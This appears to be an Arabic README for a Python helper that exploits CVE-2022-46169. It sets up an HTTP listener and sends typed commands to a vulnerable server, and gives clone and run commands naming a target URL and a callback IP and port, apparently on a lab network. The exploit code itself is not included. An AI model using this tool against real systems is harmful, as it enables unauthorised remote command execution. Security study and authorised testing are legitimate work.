
يساعد هذا السكربت المكتوب بلغة بايثون في استغلال CVE-2022-46169 من خلال أتمتة تسليم الحمولة (payload) ومعالجة الاستجابات. يبدأ تشغيل خادم HTTP، ويستمع للطلبات، ويتيح إدخال الأوامر للتفاعل في الوقت الفعلي مع الهدف المعرّض للخطر.
يعمل هذا السكربت المكتوب بلغة بايثون كأداة مساعدة لتبسيط عملية استغلال ثغرة CVE-2022-46169. يبدأ خادم HTTP يستمع للطلبات الواردة ويوفر واجهة بسيطة للمستخدم لإدخال الأوامر. يتم بعد ذلك تنفيذ هذه الأوامر على الخادم الهدف، مما يؤدي إلى أتمتة عملية إرسال الحمولات المصممة إلى خادم ضعيف ومراقبة استجابات الخادم في الوقت الفعلي.
من خلال الاستفادة من هذا السكربت، يمكن للمستخدم أتمتة عملية إرسال الحمولات المصممة إلى خادم ضعيف ومراقبة استجابات الخادم في الوقت الفعلي.
git clone [email protected]:ahanel13/ImprovedShell-for-CVE-2022-46169.git
cd ImprovedShell-for-CVE-2022-46169
python CVE-2022-46169_helper.py -h
python3 CVE-2022-46169_helper.py --target http://10.10.11.211 --ip 10.10.14.86 --port 5000

هذا السكربت مخصص للأغراض التعليمية والاستخدام القانوني فقط. احرص دائمًا على الحصول على إذن مناسب قبل إجراء أي نوع من اختبار الاختراق أو تقييم الأمان.